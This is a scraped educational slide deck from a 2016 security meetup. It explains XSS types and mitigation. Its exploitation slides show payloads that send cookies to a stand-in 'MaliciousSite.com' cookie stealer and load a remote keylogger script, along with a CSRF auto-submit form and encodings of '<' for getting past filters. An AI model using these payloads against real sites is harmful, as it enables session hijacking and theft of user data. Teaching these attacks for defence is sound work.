Identifying XSS Vulnerabilities

Preview:

Click to see full reader

Citation preview

Cross Site Scripting(XSS)@nullhyd – June’16

#Whoami?• @NahtnahS• Web App Security Guy• Works as Security Analyst• Some HOF & acknowledgements

Current Stats

Experts says

DefinitionCross-Site-Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites.

Source:owasp.org

Anatomy of XSS

Anatomy of XSS

HTML Source Code

Types Of XSS• Reflected • Stored• Dom

Reflected XSS• Reflected attack generally is used to exploit script injection

vulnerabilities via URL in a web application

How it is exploited?Send’s the link to victim

Creates

a

Malicio

us

link

Victim Requests Webpage

Sends data to Attacker

Stored XSS • Stored XSS occurs when the injected script is stored in the

database and is delivered to the visitor of the application

How stored XSS is exploitedCode gets saved into the databaseVictim visits the Infected web page

Sends data to attacker

Injects Malicious Script into web server

Malicious code gets executed in victims browser

DOM XSS• DOM Based XSS is an XSS attack wherein the attack payload is

executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner

Attacks executed by exploiting xss

• Session Hijacking• Redirection• Phishing • Keylogging• CSRF

Exploiting XSS• Redirection :

<script>document.location.href=”http://www.MaliciousSite.com/” </script>

• Session Hijacking<script>document.location.href=”http://www.MaliciousSite.com/cookiestealer.php?cookie=”+document.cookie </script>

• KeyLogging<script src=”http://www.MaliciousSite.com/keylogger.js”> </script>

Exploiting XSS• CSRF

o Page 1:• <form name=”delete”

action="http://yoursite.com/deleteuser"method="post">• <input type="hidden" name="userid" value="1">• <input type=”submit”>• </form>

o Page 2:• “><script>document.form.delete.submit();</script>

Prevention ?• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.• Never Trust User Input.

Mitigation• Input validation• Output Encoding:

o < > o &lt; &gt;o (&#40;) (&#41;)o&#35; &#38;

• Do not use "blacklist" validation• Specify the output encoding • Content Security Policy.

Bypassing XSS FiltersEncoding Techniques works sometimes .Possible ways to represent ‘<‘

<, %3C, &lt, &lt;, &LT, &LT; , &#x3c, &#x03c, &#x003c, &#x0003c, &#x00003c, &#x000003c \x3c, \x3C, \u003c, \u003C

DEMO

Questions ?

Thank You!

Recommended

XSS Injection Vulnerabilities
Technology
© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research
Documents
Identifying Software and Protocol Vulnerabilities in WPA2
Documents
Identifying Vulnerabilities in SCADA Systems via Fuzz-Testing
Documents
Security Testing of Web Applications: a Search Based Approach for XSS Vulnerabilities · Security of Web apps is also critical Number of total vulnerabilities in web applications
Documents
Code development practice - Hack.luarchive.hack.lu/2015/They Hate Us Cause They Ain't Us.pdf2 • Code development practice • Mitigates basic vulnerabilities • XSS • SQL Injection
Documents
Exploiting Vulnerabilities: SQLi, XSS, XXE, File Injection · 2/22/2019  · Greetings to you Greetings to you ... us all. XSS. XSS Where user data is echoed verbatim on a page What
Documents
faculty.scf.edufaculty.scf.edu/bodeJ/CIS2352/Supplemental Chapter... · Web viewNStalker is a WebApp security scanner used to search for vulnerabilities such as SQL injection, XSS,
Documents
Identifying Vulnerabilities and Security Management ... USDA paper For atri-online.… · Identifying Vulnerabilities and Security Management Practices 2 in Agricultural and Food
Documents
From Facepalm to Brain Bender: Exploring Client-Side Cross-Site … · 2020-05-14 · zero-day vulnerabilities to gain insights into the complexity of client-side XSS vulnerabilities
Documents
Identifying Android Inter App Communication ... · Identifying Android Inter App Communication Vulnerabilities Using Static and Dynamic Analysis Biniam Fisseha Demissie, Davide Ghio,
Documents
Srikar Nadipally. Outline Finding and Exploiting XSS Vulnerabilities Standard Reflected XSS Stored XSS DOM based XSS Prevention of XSS attack Reflect
Documents
Application Security - Deloitte United States · • Major OWASP top 10 vulnerabilities such as SQL Injection, Cross Site Scripting (XSS), Path Traversal • Block automated attacks
Documents
Ericsson Technology Review: Identifying and addressing the vulnerabilities and security issues of SDN
Technology
Cross Site Scripting Scanning - Freakshow · 2005-08-03 · Outline Introduction to Cross Site Scripting (XSS) Safe coding practices Scanning for vulnerabilities
Documents
Web Attacks Lab - benklim.orgcs482.benklim.org/labs/Web_Attack_Lab/L.pdf · can be bypassed by exploiting the XSS vulnerabilities. Vulnerabilities of this kind can potentially lead
Documents
BadNets: Identifying Vulnerabilities in the Machine …...BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain Tianyu Gu New York University Brooklyn, NY,
Documents
Exploits: XSS, SQLI, Buffer Overflow These vulnerabilities continue to result in many active exploits. XSS - Cross Site Scripting, comparable to XSRF,
Documents
The Art And Science Of Identifying And Eliminating Vulnerabilities
Data & Analytics
Exploiting Server Vulnerabilities with XSS and Server Side Scripting Attacks
Documents